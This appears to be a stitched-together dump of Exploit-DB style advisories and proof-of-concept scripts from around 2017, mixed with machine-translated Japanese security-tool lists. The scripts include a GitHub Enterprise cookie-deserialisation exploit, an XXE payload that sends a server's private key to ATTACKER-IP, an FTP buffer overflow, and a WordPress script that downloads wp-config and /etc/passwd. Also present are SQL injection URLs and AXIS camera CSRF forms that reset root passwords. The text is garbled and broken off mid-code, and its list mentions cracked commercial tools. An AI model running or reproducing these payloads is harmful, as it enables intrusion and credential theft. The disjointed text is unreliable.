http.verify_mode = OpenSSL::SSL::VERIFY_NONE # We may deal with self-signed certificates
rqst = Net::HTTP::Get.new("/")
while res = http.request(rqst)
case res
when Net::HTTPRedirection then
puts " => Following redirect to #{res["location"]}..."
rqst = Net::HTTP::Get.new(res["location"])
else
break
end
end
def not_vulnerable
puts " => Host is not vulnerable"
exit 1
end
unless res['Set-Cookie'] =~ /\A_gh_manage/
not_vulnerable
end
# Parse the cookie
begin
value = res['Set-Cookie'].split("=", 2)[1]
data = CGI.unescape(value.split("--").first)
hmac = value.split("--").last.split(";", 2).first
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, data)
not_vulnerable if expected_hmac != hmac
rescue
not_vulnerable
end
puts " => Host is vulnerable"
# Now construct the cookie
puts "[+] Assembling magic cookie..."
# Stubs, since we don't want to execute the code locally.
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
erubis = Erubis::Eruby.allocate
erubis.instance_variable_set :@src, "#{code}; 1"
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
proxy.instance_variable_set :@instance, erubis
proxy.instance_variable_set :@method, :result
proxy.instance_variable_set :@var, "@result"
session = {"session_id" => "", "exploit" => proxy}
# Marshal session
dump = [Marshal.dump(session)].pack("m")
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
puts "[+] Sending cookie..."
rqst = Net::HTTP::Get.new("/")
rqst['Cookie'] = "_gh_manage=#{CGI.escape("#{dump}--#{hmac}")}"
res = http.request(rqst)
if res.code == "302"
puts " => Code executed."
else
puts " => Something went wrong."
end
# Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection
# Google Dork: inurl:tab=node_steam_steamprofile
# Date: 13/03/2017
# Exploit Author: DrWhat
# Vendor Homepage: https://invisionpower.com/files/file/8170-steam-profile-integration/
# Software Link: https://invisionpower.com/files/file/8170-steam-profile-integration/
# Version: 2.0.11 and below
# Tested on: Windows Server 2008 PHP7 & Linux Debian PH5.6
# SQL Injection/Exploit: http://localhost/path/index.php?app=steam&module=steam§ion=steamProfile&do=update&id=[USER_WITH_STEAM]%' OR EXTRACTVALUE(1001,CONCAT(0x3A,([QUERY]),0x3A)) AND '%'='&csrfKey=[CSRF_KEY]
# Vulnerable code: /sources/Update/Update.php updateProfile() function
# 532: $ids = array();
# 533: $steamids = '';
# 534: $select = "s.st_member_id,s.st_steamid,s.st_restricted";
# 535: $where = "s.st_steamid>0 AND s.st_restricted!='1'";
# 536: if($single)
# 537: {
# 538: $where .= " AND s.st_member_id='{$single}'"; // $single is $_GET['id'] pass through the router
# 539:
# 540: /* Is the member already in the database ? */
# 541: $s = \IPS\steam\Profile::load($single); // IPS Profile model cleans the request and successfully executes the query
# 573: $query = \IPS\Db::i()->select( $select, array('steam_profiles', 's'), $where, 's.st_member_id ASC', array( $this->extras['profile_offset'], 100), NULL, NULL, '011'); // Our payload is then later executed in the $where variable unsanitized
# Timeline
# 13/03/2017: Exploit discovered
# 13/03/2017: Vendor notified
# 14/03/2017: Vendor confirmed vulnerablity
# 15/03/2017: Vendor releases patch 2.0.12
# 15/03/2017: Public disclosure
スキャンをスキャン
nessus(ホームバージョン)
Openvas(KaliにOpenvasをインストールし、吊りエージェントに注意を払ってください。そうしないと、非常に遅くなり、エラーが報告されます)
AWVS(クラックバージョン-52pojie)
AppScan(クラックバージョン)
BurpsuitePro(クラックバージョン)
MOBSF(モバイルアプリクライアントはiOSをサポートしますが、Macで実行する必要があります)
NMAP/ZMAP/MASSCANポートスキャン
脆弱性管理
Insight
smef
fuxi
Defectdojo
電気チューブ
Jira
禅タオ
srcプラットフォーム
SRCMS
laravel-src
資産管理/自動操作とメンテナンス
Xunfeng
AssetsView
ブルークジラBK-CMDB
opsmanage
Ansible
ソルトスタック
soc
SOSRP
W3A_SOC
opensoc
オシム
侵入検知/セキュリティ監視/トラフィックバックトラッキング
Suricata(Selks)
仲間
Ossec(wazuh)
セキュリティ玉ねぎ
owlh
Nethserver
鼻を鳴らします
openwips-ng
モロク
Tongcheng-dragon
CloudWalker(Mu Yun)はWebShell CheckとKillのみを開くだけです
osquery
Webアプリケーションセキュリティ
NGX_LUA_WAF
OpenStar
modsecurity
OpenWaf
OpenRasp
x-waf
jxwaf
集中ターミナルセキュリティ管理
360エンタープライズエディション
芝の安全
要塞
ジャンプサーバー
テレポート
コード品質管理/コード監査
ソナー +ジェキンス
コブラ
VCG
Fortify(ひび割れたバージョン、見つかった最新のルールは2018.3です)
RIPS/SEAYソースコード監査システム(PHP))
FindBugs(Java)
Webログ監査
360スター画像
xlog
ロルグ
ログ分析システム
エルク(es+logstash+kibana)
Kibana_hanization(Kibana Chineseバージョン)
オンライン行動管理/アクセス/認定
Packetfence
イクアイ
openldap
中央認証サービス(CAS)
データリーク防止
opendlp
ベースライン検査/強化
cis
リニス監査
Winspect
openscap
githubリークスキャン
X-patrol
ホークアイ
gsil
vksrc/github-monitor
カタログインデックスシステム/パーソナルネットワークディスク/ファイル共有
ZDIR
NextCloud
シーフィルコミュニティエディション
owncloud
オニオンシャレ
Pydio細胞
honeypot
opencanary_web
Tポット
Mhn
釣り
P神のフィッシング
mail_fishing
ブラックキー
gophish
APIゲートウェイ
GOKU-API-GATEWAY
コング
その他
Webrange(Docker Management Platform)
App-Host(イントラネットアプリのリリース)
アドバックボックス
osquery
php-sso
スカウト(URL監視プラットフォーム)
jxotp(2因子認証システムへのsshログイン)
Doclever
リニス監査
射手
Walle-Web(コード展開プラットフォーム)
アポロ(構成センター)
変化するオープンソースMuyun Cloudwalker(WebShell検出パーツのみ)
星雲の「星雲」ビジネスリスク制御システム
Meituan DBProxyデータベースファイアウォール
Linuxの下のrkhunter/chkrootkit
Pchunter/Turf Sword/Powertool/ProcessExplorer/ProcessHacker/Autoruns/OTLを獲得します
カスペルスキー
FASTIR_COLLECTOR_WINフォレンジック
FASTIR_COLLECTOR_LINUX FORNSICS
dシールドウェブシェルチェックとキル
Sandboxie Personal Sandbox
クラマブ
# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore Experience Platform 8.1 Update-3
# Date: March 15, 2017
# Exploit Author: Pralhad Chaskar
# Vendor Homepage: http://www.sitecore.net/en
# Version: 8.1 rev. 160519
# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
# CVE : CVE-2016-8855
Vendor Description
------------------
Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.
Description
------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Vulnerability Class
--------------------
Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of Concept
----------------
Name and Description input fields aren't properly escaped. This could lead to an XSS attack that could possibly affect administrators,users,editor.
1. Login to application and navigate to "https://abc.com/sitecore/client/Applications/List Manager/Taskpages/Contact list"
2. Create new Contact List, add the XSS vector in Name and Description parameter using proxy (Burp) and Save the Contact List
3. Navigate Dashboard of List Manager on "https://abc.com/sitecore/shell/sitecore/client/Applications/List Manager/Dashboard" leading to execution of XSS payload.
Vendor Contact Timeline
------------------------
Discovered: October 16, 2016
Vendor Notification: October 18, 2016
Advisory Publication: Mar 15, 2017
Public Disclosure: Mar 15, 2017
Affected Targets
----------------
Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
Solution
--------
Upgrade to Sitecore Experience Platform 8.2 Update-2 to fix this issue.
Credits
-------
Pralhad Chaskar
Information Security Analyst
Help AG Middle East
References
----------
[1] Help AG Middle East http://www.helpag.com/
[2] Sitecore Experience Platform https://dev.sitecore.net/Downloads/Sitecore_Experience_Platform.aspx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
=================
Windows DVD Maker
v6.1.7
Windows DVD Maker is a feature you can use to make DVDs that you can watch on a computer or on a TV using a regular DVD player.
Vulnerability Type:
=============================
XML External Entity Injection
CVE Reference:
==============
CVE-2017-0045
MS17-020
Security issue:
================
Windows DVD Maker Project ".msdvd" files are prone to XML External Entity attacks allowing remote attackers to gain access
to files from a victims computer using a specially crafted malicious .msdvd file, resulting in remote information / file disclosures.
POC URL:
=========
https://vimeo.com/208383182
References:
============
https://technet.microsoft.com/library/security/MS17-020
https://support.microsoft.com/en-us/help/3208223/ms17-020-security-update-for-windows-dvd-maker-march-14-2017
Applies to:
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Datacenter
Windows Server 2008 R2 Enterprise
Windows Server 2008 R2 Standard
Windows Web Server 2008 R2
Windows Server 2008 R2 Foundation
Windows 7 Service Pack 1
Windows 7 Ultimate
Windows 7 Enterprise
Windows 7 Professional
Windows 7 Home Premium
Windows 7 Home Basic
Windows 7 Starter
Windows Server 2008 Service Pack 2
Windows Server 2008 Foundation
Windows Server 2008 Standard
Windows Server 2008 for Itanium-Based Systems
Windows Web Server 2008
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Vista Service Pack 2
Windows Vista Home Basic
Windows Vista Home Premium
Windows Vista Business
Windows Vista Ultimate
Windows Vista Enterprise
Windows Vista Starter
Exploit code(s):
===============
Steal XAMPP Web Servers private key "server.key".
1) python -m SimpleHTTPServer 8080 (listens on ATTACKER-IP, hosts payload.dtd)
2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
%all;
3) "Evil.msdvd"
<?xml version="1.0"?>
<!DOCTYPE NYHC [
<!ENTITY % file SYSTEM "C:\xampp\apache\conf\ssl.key\server.key">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
RESULT:
XAMPP Web Server private key sent to attacker:
e.g.
C:\>python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /?-----BEGIN%20RSA%20PRIVATE%20KEY-----MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZpjjFtzhpB5zMPWo3m4dbwelHx8buOt0CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E
ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmkcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-----END%20RSA%20PRIVATE%20KEY----- HTTP/1.1" 301 -
127.0.0.1 - - [13/Mar/2017 23:53:37] "GET /?-----BEGIN%20RSA%20PRIVATE%20KEY-----MIICXQIBAAKBgQDBJdMn4+ytDYNqbrdfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5zMPmo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E
ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh3YQYiKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-----END%20RSA%20PRIVATE%20KEY-----/ HTTP/1.1" 200 -
Disclosure Timeline:
=========================================
Vendor Notification: September 3, 2016
Vendor acknowledgement: November 17, 2016
March 14, 2017 : Vendor released MS17-020
March 15, 2017 : Public Disclosure
Network access:
=================
Remote
Severity:
===========
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880
Vendor:
===============
https://www.cerberusftp.com/
Download:
===========
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
Vulnerability Type:
===================
Remote Buffer Overflow.
issue:
===================
This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
import socket
bad_char = "A"*2047
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.81',21))
s.recv(1024)
s.send('USER nassim\r\n')
s.recv(1024)
s.send('PASS mypass\r\n')
s.recv(1024)
s.send('MLST ' + bad_char + '\r\n')
s.close()
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
Tested on:
===============
Windows 7 Sp1 (64 Bit)
import requests
import string
import random
from urlparse import urlparse
print "---------------------------------------------------------------------"
print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187"
print "---------------------------------------------------------------------"
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n")
if file_choice == "1":
payload="..././..././..././wp-config.php"
elif file_choice == "2":
payload="..././..././..././..././..././..././..././..././etc/passwd"
else:
print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"
quit()
slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload
target=victim+slug
def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def checkPlugin():
pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
pluginExistence = pluginExists.status_code
if pluginExistence == 200:
print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
exploit()
else:
print "Target has a funny code & might not be vulnerable, I will now exit\n"
quit()
def exploit():
getThatFile = requests.get(target)
fileState = getThatFile.status_code
breakApart=urlparse(victim)
extract_hostname=breakApart.netloc
randomDifferentiator=randomizeFile()
cleanName=str(randomDifferentiator)
if fileState == 200:
respFromThatFile = getThatFile.text
if file_choice == "1":
resultFile=extract_hostname+"_config_"+cleanName+".txt"
print resultFile
pwned=open(resultFile, 'w')
pwned.write(respFromThatFile)
pwned.close
print "Wordpress Config Written to "+resultFile
else:
resultFile=extract_hostname+"_passwd"+cleanName+".txt"
pwned=open(resultFile, 'w')
pwned.write(respFromThatFile)
pwned.close
print "Passwd File Written to "+resultFile
else:
print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState
if __name__ == "__main__":
checkPlugin()
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1043
I noticed that some javascript getters behave strangely.
My test code:
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
var f = document.createElement("iframe");
f.onload = () => {
f.onload = null;
for (var x in window) {
if (whitelist.indexOf(x) != -1)
continue;
try {
window.__lookupGetter__(x).call(f.contentWindow);
log(x);
} catch (e) {
}
}
};
f.src = "https://abc.xyz/";
document.body.appendChild(f);
And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.
Tested on Microsoft Edge 38.14393.0.0.
-->
<!--
Microsoft Edge: Undefined behavior on some getters
I noticed that some javascript getters behave strangely.
My test code:
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
var f = document.createElement("iframe");
f.onload = () => {
f.onload = null;
for (var x in window) {
if (whitelist.indexOf(x) != -1)
continue;
try {
window.__lookupGetter__(x).call(f.contentWindow);
log(x);
} catch (e) {
}
}
};
f.src = "https://abc.xyz/";
document.body.appendChild(f);
And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.
Tested on Microsoft Edge 38.14393.0.0.
-->
<pre id="d">
</pre>
<body></body>
<script>
function log(txt) {
var c = document.createElement("div");
c.innerText = "log: " + txt;
d.appendChild(c);
}
function main() {
var f = document.createElement("iframe");
f.onload = () => {
f.onload = () => {
var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow);
var func_cons = status.constructor.constructor;
var ff = func_cons("return 0x12345;");
for (var i = 0; i < 0x100000; i++)
ff();
f.onload = () => {
alert("get ready");
ff();
};
f.src = "about:blank";
};
//a = f.contentWindow;
f.src = "about:blank";
};
document.body.appendChild(f);
}
main();
</script>
1。 Xray
のインストールと構成1。linux[root@instance-7q32v011 opt] #wget https://github.com/chaitin/xray/releases/download/0.21.8/xray_linux_amd64.zip 
2。ファイルを解凍します[root@instance-7q32v011 opt] #unzip xray_linux_amd64.zip 
3。 Xray実行可能ファイルを実行して、証明書と構成ファイルを生成する
[root@instance-7q32v011 opt] 
2。サーバーソースの構成
1。ログイン:githubアカウントでウェブサイトにログインすると、sckey( "send message"ページ)
2を取得できます。バインド:「WeChat Push」をクリックし、QRコードをスキャンして
3と同時にバインディングを完了します。メッセージを送信:http://Sc.ftqq.com/sckey.sendにGet Requestを送信して、WeChatでメッセージを受信できます。そのようなGETリクエストを生成する場合:https://sc.ftqq.com/scu100930te4d1
0RWELLL4BS
**********
security advisory
olsa-2015-8258
PGP: 79A6CCC0
@orwelllabs
Advisory Information
====================
- Title: ImagePath Resource Injection/Open script editor
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Improper Input Validation [CWE-20]
- CVE Name: CVE-2015-8258
- Affected Versions: Firmwares versions <lt 5.80.x
- IoT Attack Surface: Device Administrative Interface/Authentication/Autho
rization
- OWASP IoTTop10: I1, I2
Technical Details
=================
The variable "imagePath=" (that is prone to XSS in a large range of
products) also can be used to resource injection intents. If inserted a URL
in this variable will be made an GET request to this URL, so this an
interesting point to request malicious codes from the attacker machine, and
of course, the possibilities are vast (including hook the browser).
An attacker sends the following URL for the current Web user interface of
the camera:
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html
This request will be processed normally and will return the status code 200
(OK):
[REQUEST]
GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
Host: {axisvulnhost}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
Connection: keep-alive
GET /evilcode.html HTTP/1.1
Host: www.3vilh0st.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html
Connection: keep-alive
The server response can be seen below (with the clipping of the affected
HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):
<table border="0" cellpadding="3" cellspacing="3">
<tr>
<td id="videoStreamTable">
<script language="JavaScript">
<!--
video('http://www.3vilh0st.com/evilcode.html');
// -->
</script>
</td>
</tr>
</table>
[..SNIP..]
function listVideoSources()
{
var formInt = document.listFormInt;
var formExt = document.listFormExt;
var formCrop = document.listFormCrop;
var presetForm = document.listFormPreset;
var form = document.WizardForm
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
var imageSource;
[..SNIP..]
var reload = false;
reload |= (other != null && other.search("seq=yes") >= 0);
reload |= (other != null && other.search("streamprofile=") >= 0);
reload |= ((other == null || (other != null && other.search("streamprofile=
;)(r") == -1)) && ('' != ""));
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
[..SNIP..]
<script SRC="/incl/activeX.js?id=69"></script>
</head>
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
<script language="JavaScript">
[..SNIP..]
// Draw the scale buttons
var currentResolution = 0
var width = 0
var height = 0
var imagepath = "http://www.3vilh0st.com/evilcode.html"
var resStart = imagepath.indexOf("resolution=")
if (resStart != -1) {
var resStop = imagepath.indexOf("&", resStart)
[..SNIP..]
=================== view.shtml snips =====================
447 function zoom(size)
448 {
449 var url = document.URL;
450
451 if (url.indexOf("?") == -1) {
452 url += "F?size=" + size
453 } else if (url.indexOf("size=") == -1) {
454 url += "&size=" + size
455 } else {
456 var searchStr = "size=<!--#echo var="size"
option="encoding:javascript" -->"
457 var replaceStr = "size=" + size
458 var re = new RegExp(searchStr , "g")
459 url = url.replace(re, replaceStr)
460 }
461
462 document.location = url;
463 }
464
465 var aNewImagePath;
466
467 function reloadPage()
468 {
469 document.location = aNewImagePath;
470 }
471
[ SNIP ]
567 aNewImagePath = '/view/view.shtml?id=<!--#echo
var="ssi_request_id" option="encoding:url" -->&imagePath=' +
escape(imagePath) + size;
568 if (other != null)
569 aNewImagePath += other;
570 <!--#if expr="$ptzpresets = yes" -->
571 /* append preset parameters so that preset postion is selected in
drop down list after reload */
572 if (presetName != '')
573 aNewImagePath += "&gotopresetname=" + escape(presetName);
574 else if (gotopresetname != '')
575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
576
577 if( newCamera != '')
578 aNewImagePath += "&camera=" + escape(newCamera);
---*---
Some legitimate resources can be very interesting to cybercriminals with
your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case
there are some resources, like the "Open Script Editor". By this resource
the user can edit any file in the operation system with root privileges,
because everything (in the most part of IoT devices) runs with root
privileges, this is other dangerous point to keep in mind.
> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
Well, one can say that this feature is restricted to the administrator of
the camera, and this would be true if customers were forced to change the
default password during setup phase with a strong password policy, since
change "pass" to "pass123" does not solve the problem. The aggravating
factor is that there are thousands of products available on the internet,
running with default credentials.
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the manufacturer, the resource injection vulnerability was
fixed in firmware 5.60, but we identified that the problem still occurred
in 5.80.x versions of various product models. Check for updates on the
manufacturer's website.
About Open Script Editor,It was considered that in order to have access to
this feature, it is necessary to be authenticated as an admin, but if there
is no policy that forces the client to change the password during the
product setup (ease vs. security) and also requires a password complexity,
having an administrative credential to abuse the functionality is not
exactly an impediment (e.g: botnets that bring embedded in the code a
relation of default credentials for that type of device)
Credits
=======
These vulnerabilities has been discovered and published by Orwelllabs.
Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
0RWELLL4BS
**********
security advisory
olsa-CVE-2015-8255
PGP: 79A6CCC0
@orwelllabs
Advisory Information
====================
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Session Management control [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1
Technical Details
=================
Because of the own (bad) design of this kind of device (Actualy a big
problem of IoT, one of them)
The embedded web application does not verify whether a valid request was
intentionally provided by the user who submitted the request.
PoCs
====
#-> Setting root password to W!nst0n
<html>
<!-- CSRF PoC Orwelllabs -->
<body>
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
<input type="hidden" name="action" value="update" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="pwd" value="w!nst0n" />
<input type="hidden" name="comment" value="Administrator" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#-> Adding new credential SmithW:W!nst0n
<html>
<!-- CSRF PoC - Orwelllabs -->
<body>
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="user" value="SmithW" />
<input type="hidden" name="sgrp"
value="viewer:operator:admin:ptz" />
<input type="hidden" name="pwd" value="W!nst0n" />
<input type="hidden" name="grp" value="users" />
<input type="hidden" name="comment" value="WebUser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#-> Deleting an app via directly CSRF (axis_update.shtml)
http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
"></script>
[And many acitions allowed to an user [all of them?] can be forged in this
way]
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
Well, this is a very old design problem of this kind of device, nothing new
to say about that.
Credits
=======
These vulnerabilities has been discovered and published by Orwelllabs.
Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
# # # # #
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
# Google Dork: N/A
# Date: 17.03.2017
# Vendor Homepage: http://webstarslab.com
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
# Demo: http://webstarslab.com/departmental-store-management-system/store/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
# tbl_users:id
# tbl_users:username
# tbl_users:password
# tbl_users:email
# tbl_users:full_name
# tbl_users:permission
# Etc..
# # # # #
#!/usr/bin/python
"""
